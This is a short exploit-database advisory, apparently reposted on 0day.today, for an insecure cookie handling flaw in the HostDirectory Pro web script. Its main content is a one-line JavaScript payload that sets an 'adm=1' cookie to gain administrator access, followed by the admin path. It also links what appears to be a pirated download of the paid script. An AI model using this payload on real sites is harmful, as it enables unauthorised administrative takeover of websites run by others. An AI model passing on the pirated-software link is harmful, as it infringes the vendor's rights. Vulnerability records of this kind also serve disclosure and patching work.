id: 2902
date: 04/19/2008
title: HostDirectory Pro Insecure Cookie Handling Vulnerability
author: Crackers_Child
cves: 

========================================================
HostDirectory Pro Insecure Cookie Handling Vulnerability
========================================================



$ Script.......: HostDirectory Pro

$ Download.....: http://www.mediafire.com/?71nvkj199n7  (null) Real Price :Price (single license) : $79.95 USD

$ Class........: Insecure Cookie Handling

$ Demo.........: http://scriptsfrenzy.com/demo_host_directory_pro/

$ Exploit......: javascript:document.cookie = "adm=1 path=/;";

$ AdminPath....: www.site.com/script_path/admin/



#  0day.today [2023-03-24]  #